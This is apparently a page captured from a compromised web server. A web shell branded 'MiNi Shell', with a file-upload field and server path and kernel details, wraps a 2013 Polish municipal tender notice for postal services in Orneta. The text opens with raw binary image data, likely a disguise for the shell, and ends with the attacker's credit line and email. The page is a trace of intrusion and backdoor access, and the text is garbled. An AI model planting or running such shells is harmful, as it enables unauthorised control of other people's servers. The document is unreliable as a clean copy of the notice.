JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131129/492286-N-2013.html

<p class="kh_header"><b>Orneta: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na potrzeby Urzędu Miejskiego w Ornecie</b><br>
<b>Numer ogłoszenia: 492286 - 2013; data zamieszczenia: 29.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na potrzeby Urzędu Miejskiego w Ornecie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sukcesywne świadczenie usług pocztowych w obrocie krajowym i zagranicznym w zakresie przyjmowania, sortowania, przemieszczania i doręczania przesyłek  pocztowych oraz ich ewentualnych zwrotów w rozumieniu ustawy z dnia 23 listopada 2013 roku Prawo pocztowe (Dz. U. z 2012 r., poz. 1529) na rzecz Urzędu Miejskiego w Ornecie
2.Przedmiot zamówienia obejmuje w szczególności: 
1)  przyjmowanie, sortowanie, przemieszczanie i doręczanie w obrocie krajowym i  
zagranicznym ekonomicznych i  priorytetowych:
a)przesyłek listowych nierejestrowanych przez które rozumie się przesyłki pocztowe 
przyjęta bez pokwitowania  przyjęcia i doręczone bez pokwitowania odbioru (przesyłki listowe zwykłe),      
b)przesyłek listowych rejestrowanych przez które rozumie się przesyłki pocztowe  przyjęte za pokwitowaniem przyjęcia i doręczone za pokwitowaniem odbioru  (przesyłki listowe  polecone),
c)przesyłek z zadeklarowana wartością
d)paczek pocztowych
2)świadczenie usługi potwierdzenie odbioru w obrocie krajowym i  zagranicznym
3)zwrot do siedziby Zamawiającego nie doręczonych przesyłek niezwłocznie po wyczerpaniu możliwości ich doręczenia.
3.Usługi będące przedmiotem zamówienia będą świadczone zgodnie z przepisami powszechnie obowiązującego prawa  oraz międzynarodowymi przepisami pocztowymi obowiązującymi w dniu świadczenia przedmiotu zamówienia, w szczególności z  ustawą z dnia 23 listopada 2012 r Prawo Pocztowe (Dz. U. z 2012 r. poz. 1529) i aktami wykonawczymi wydanymi na jej podstawie 
4.Szczegółowy opis przedmiotu zamówienia został przedstawiony w Opisie przedmiotu Zamówienia  Rozdziału III SIWZ. 
Pozostałe warunki dotyczące realizacji przedmiotu zamówienia zostały określone w  Projekcie umowy  Rozdziału IV SIWZ. 
5.Szacunkowe   zapotrzebowanie na  usługi  będące przedmiotem zamówienia  zostało  określone w Formularzu cenowym stanowiącym  załącznik Nr 2 do IDW  Rozdziału II SIWZ .  
Ilości   wymienione w  ww. załączniku są wielkościami orientacyjnymi, przyjętymi dla celów porównania  ofert i wyboru  najkorzystniejszej  oferty.    
Wykonawcy,   z    którym   Zamawiający    podpisze    umowę,    nie  przysługuje roszczenie o realizację  usługi w  wielkościach podanych w Formularzu   cenowym. 
Rodzaje i ilości nadawanych przesyłek przez Zamawiającego mogą się zmieniać z zależności  od jego potrzeb, Wykonawca wyraża na to zgodę i nie będzie dochodził roszczeń odszkodowawczych z tytułu zmian. Liczba i rodzaj nadawanych przez Zamawiającego przesyłek pocztowych nie może mieć też wpływu na zaproponowane przez Wykonawcę ceny jednostkowe..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp .  Wielkość zamówienia uzupełniającego do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże , że 
posiada uprawnienia do wykonywania działalności pocztowej, na podstawie wpisu do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r. poz. 1529).      
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty dokumentu wymienionego § 6 ust.1 pkt 2 IDW  tj 
-  dokumenty potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności, w szczególności koncesji, zezwolenia lub licencji  w tym przepadku zaświadczenie potwierdzające, iż wykonawca został wpisany do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ
2)  Formularz cenowy sporządzony wg Załącznika nr 2 do IDW Rozdziału II SIWZ
3)  Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru, a w przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia   albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia    publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
4)  Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć 
podwykonawcom  według załącznika nr 5 do IDW Rozdziału II SIWZ
5)  Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa  w rozumieniu przepisów o  zwalczaniu nieuczciwej konkurencji  sporządzone wg załącznika nr 6 do IDW Rozdziału II SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.   Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:  
1) konieczność skrócenia terminu umownego zakończenia przedmiotu Umowy  w przypadku wyczerpania kwoty, stanowiącej maksymalne wynagrodzenie Wykonawcy z tytułu realizacji przedmiotu zamówienia bez prawa Wykonawcy do  dochodzenia z tego tytułu  jakichkolwiek roszczeń. 
Powyższa zmiana (skrócenie) terminu zakończenia realizacji przedmiotu Umowy  nie  spowoduje zmiany cen jednostkowych brutto za świadczenie poszczególnych usług objętych przedmiotem Umowy wymienionych w Formularzu cenowym oraz  żadnych innych  sankcji finansowych dla Zamawiającego z tytułu wcześniejszego rozwiązania umowy na realizację  przedmiotu zamówienia
2)  zmianę ilościowego zakresu rzeczowego  przedmiotu Umowy  w przypadku:
a) mniejszej/większej ilości zakresu rzeczowego faktycznie realizowanego 
b) podjęcia przez Zamawiającego decyzji o realizacji części  zakresu rzeczowego 
przedmiotu Umowy  we własnym zakresie 
c) braku środków finansowych na realizację całego  zakresu przedmiotu Umowy            
Powyższe zmiany nie spowodują zmiany cen jednostkowych brutto  za świadczenie  poszczególnych usług objętych przedmiotem zamówienia wymienionych w Formularzu cenowym oraz   żadnych innych sankcji finansowych dla Zamawiającego  z tytułu zmiany ilościowego  zakresu rzeczowego przedmiotu Umowy.
3)  w przypadku wprowadzenia przez Wykonawcę nowego  cennika   na świadczenie  usług pocztowych należących do przedmiotu umowy obowiązującego na terenie całego kraju i w odniesieniu do wszystkich nadawców,  Zamawiający dopuszcza możliwość zmiany cen jednostkowych, odpowiednio tej usługi lub usług pod warunkiem ich zaakceptowania przez  Zamawiającego, a w przypadkach gdy jest to wymagane obowiązującymi przepisami prawa, również pod warunkiem wcześniejszego zatwierdzenia nowych cen usługi lub usług przez Prezesa Urzędu Komunikacji Elektronicznej z tym, że zmiana ta  nie może następować 
częściej niż raz w okresie obowiązywania niniejszej umowy, a ceny jednostkowe 
poszczególnych usług wzrastają lub maleją  proporcjonalnie do zmian cen jednostkowych świadczenia usług pocztowych  świadczonych dla ogółu odbiorców.
W przypadku zmiany cennika powszechnych usług pocztowych obowiązującego na terenie całego kraju i w odniesieniu do wszystkich nadawców , Wykonawca będzie  zobowiązany dostarczyć niezwłocznie Zamawiającemu nowy cennik usług pocztowych  zatwierdzony przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez obowiązujące przepisy Prawa pocztowego.
4)  zmianę wynagrodzenia Wykonawcy w przypadku:
a)  zmiany ilościowego zakresu rzeczowego  przedmiotu  Umowy o  którym  mowa  w pkt  2 ppkt. 2) niniejszego paragrafu 
b)  zmiany cen jednostkowych świadczenia usług pocztowych  przedstawionych przez  Wykonawcę w Formularzu cenowym oraz cenniku usług pocztowych Wykonawcy o  której mowa w pkt 2 ppkt 3 niniejszego paragrafu z zastrzeżeniem pkt 4
c)  zmiany ustawowej stawki podatku VAT   dotyczącej usługi lub usług należących do przedmiotu umowy
W przypadku  zmiany przepisów określających wysokość należnego podatku VAT na   usługi pocztowe w trakcie trwania niniejszej umowy, Wykonawca zastosuje    
obowiązujący podatek VAT, co skutkować będzie zmianą cen jednostkowych przesyłek, w zakresie odpowiadającym zmianie wysokości stawki obowiązującego podatku VAT.
5)  konieczność wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia Rozdziału  III SIWZ w zakresie wykonania usług tj :
a)   zmiany usługi, nazwy usługi lub sposobu jej świadczenia na usługę aktualnie  
świadczoną, w przypadku zmiany nazwy usługi lub sposobu jej świadczenia przez 
Wykonawcę.
b)   zmiany sposobu wykonywania usługi,  modyfikacji lub odstępstwa w odniesieniu do opisu przedmiotu zamówienia w przypadku zmiany powszechnie obowiązujących 
przepisów  lub wprowadzenia nowych przepisów prawa.
6)  zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa, 
7)   oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
8)  powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie  będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
9)  konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla Zamawiającego
3. Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie przedmiotu Umowy. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.
4. Wystąpienie którejkolwiek z wymienionych wyżej w pkt. 2 i 3 okoliczności nie stanowi zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com